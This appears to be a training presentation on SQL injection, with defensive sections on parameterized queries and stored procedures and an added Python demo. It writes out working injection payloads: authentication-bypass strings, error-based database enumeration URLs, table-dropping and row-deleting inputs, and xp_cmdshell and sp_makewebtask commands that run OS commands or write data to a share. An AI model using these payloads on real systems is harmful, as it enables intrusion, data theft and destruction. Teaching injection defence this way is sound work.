SQL Injection
Presenter: Pham Nhat Anh
What Is This? And How to Defend?
AGENDA
• Introduction
• SQL Injection statistics over 6 years
• Risks Posed By SQL Injection
• How to prevent SQL Injection correctly
• Question & Answers
INTRODUCTION
• SQL injection is now one of the most common attacks on the Internet. Simply go to Yahoo! or Google and search for "SQL injection" and you will find tons of related documents.
• Although awareness of SQL injection is rising, many people still do not have a concrete idea of how to prevent SQL injection attacks.
• This presentation is going to tell you not only some information about SQL injection but also something more important: how to prevent SQL injection correctly.
What is SQL injection ?
• The process of adding SQL statements in user input
• Used by hackers to:
  – Probe databases
  – Bypass authorization
  – Execute multiple SQL statements
  – Call built-in stored procedures
What is SQL injection …?
• SQL statements "injected" into an existing SQL command
• Injection occurs through malformed application input:
  – Text box
  – Query string
  – Manipulated values in HTML
SQL injection Example
• If the username and password are read directly from a web form or Windows Forms textbox, the user could enter the following:
  – Username: '; drop table users --
  – Password: (left empty)
  – Final query: select * from users where username = ''; drop table users -- ' and password = '';
• The vulnerable statement is built by string concatenation:
  sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
SQL Injection statistics
Risks Posed by SQL injection.
• Confidentiality
  – SELECT
• Data integrity
  – INSERT
  – DROP
  – DELETE
• Authentication bypass
  – ' OR 1=1 --
• System compromise
  – Stored procedures
  – Extended stored procedures
CONFIDENTIALITY
• Get some important information with SELECT statements
  – Get server version: http://localhost/demo.aspx?id=1' OR 1=CONVERT(int,(SELECT @@version))--
  – Get database name: http://localhost/demo.aspx?id=1' OR 1=CONVERT(int,(db_name()))--
  – Get tables list: http://localhost/demo.aspx?id=1' OR 1=CONVERT(int,(SELECT name FROM sysobjects WHERE xtype='U'))--
  – Get columns list: ' OR 1=CONVERT(int,(SELECT TOP 1 [name] FROM syscolumns WHERE [ID]=(SELECT [ID] FROM sysobjects WHERE [name]='rfPayment_Methods')))--
Data Integrity
• Insert: '; INSERT INTO Table1(col1,col2) VALUES ('Admin2','123456') --
• Delete: '; DELETE FROM Table1 WHERE col1='Admin' --
• Drop: '; DROP TABLE Table1 --
AUTHENTICATION BYPASS
• Login
  – Username = ' OR ''='   Password = ' OR ''='
  – Username = ' OR 1=1 --
  – Username = ' OR 'a'='a' --
System Compromise
• Extended stored procedures
  – '; EXEC master.dbo.xp_cmdshell 'Net user >c:\inetpub\wwwroot\users.txt' --
  – '; EXEC sp_makewebtask '\\10.1.1.2\public\output.html', 'SELECT * FROM ADMIN' --
How to prevent SQL Injection correctly
• Input validation, and remove some meta characters (' " ; \ ...)
• Parameterize DML
• Stored procedures
• Remove unusual system stored procedures
PARAMETERIZE DML
If DML is a requirement of the application, add parameters to the SQL statements:
string sql = "SELECT * FROM Users " +
             "WHERE username=@Username " +
             "AND password=@Password";
SqlCommand command = new SqlCommand(sql, connection);
command.Parameters.Add("@Username", SqlDbType.VarChar).Value = UserName.Text;
command.Parameters.Add("@Password", SqlDbType.VarChar).Value = Password.Text;
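As an added example (not from the presentation), the slides' concatenated login query beside the parameterized version, written in Python with SQLite instead of the slides' C#/SQL Server; the users table, its rows and the credentials are constructed for the demo.

```python
import sqlite3

# Constructed sample data: an in-memory stand-in for the slides' "users"
# table (assumed schema: username, password).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2')")
    conn.commit()
    return conn

def login_concat(conn, username, password):
    """Vulnerable form from the slides: input is concatenated into the SQL text,
    so quote characters in the input change the statement's structure."""
    sql = ("select * from users where username = '" + username +
           "' and password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_param(conn, username, password):
    """Parameterized form: the statement text is fixed and the driver binds the
    values, so the input is compared as data and never parsed as SQL."""
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()

def demo():
    conn = make_db()
    bypass = "' OR 1=1 --"    # authentication-bypass string shown on the slides
    both_fields = "' OR ''='"  # the two-field variant, also from the slides
    return {
        # concatenation: WHERE clause becomes "username = '' OR 1=1 --..." -> every row
        "concat_rows": len(login_concat(conn, bypass, "")),
        "concat_both_fields": len(login_concat(conn, both_fields, both_fields)),
        # parameters: the same strings match no username -> no rows
        "param_rows": len(login_param(conn, bypass, "")),
        "param_both_fields": len(login_param(conn, both_fields, both_fields)),
        # a genuine credential still works with parameters
        "param_valid": len(login_param(conn, "admin", "s3cret")),
    }

if __name__ == "__main__":
    print(demo())
```

SQLite's execute() refuses a second statement, so the slides' "'; drop table users --" case cannot be reproduced here; it needs a server that runs batches, which is why the query-stacking risk on the slides is specific to SQL Server-style drivers.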
STORED PROCEDURES
• Less vulnerable to SQL injection attacks
• Added security via EXECUTE permission
SqlCommand command = new SqlCommand("Users_GetUser", connection);
command.CommandType = CommandType.StoredProcedure;
command.Parameters.Add("@Username", SqlDbType.VarChar).Value = UserName.Text;
command.Parameters.Add("@Password", SqlDbType.VarChar).Value = Password.Text;
Conclusion
• SQL injection is one of the most important problems in web application security
• As shown on page 7, the number of vulnerabilities reported more than tripled from January to June 2001 to the same period in 2006, and it is expected that this figure will continue to increase in the near future.
• The solutions for SQL injection are not very complicated, but they require good management to deploy properly
• Don't underestimate SQL injection; tackle the problem in a more holistic and systematic approach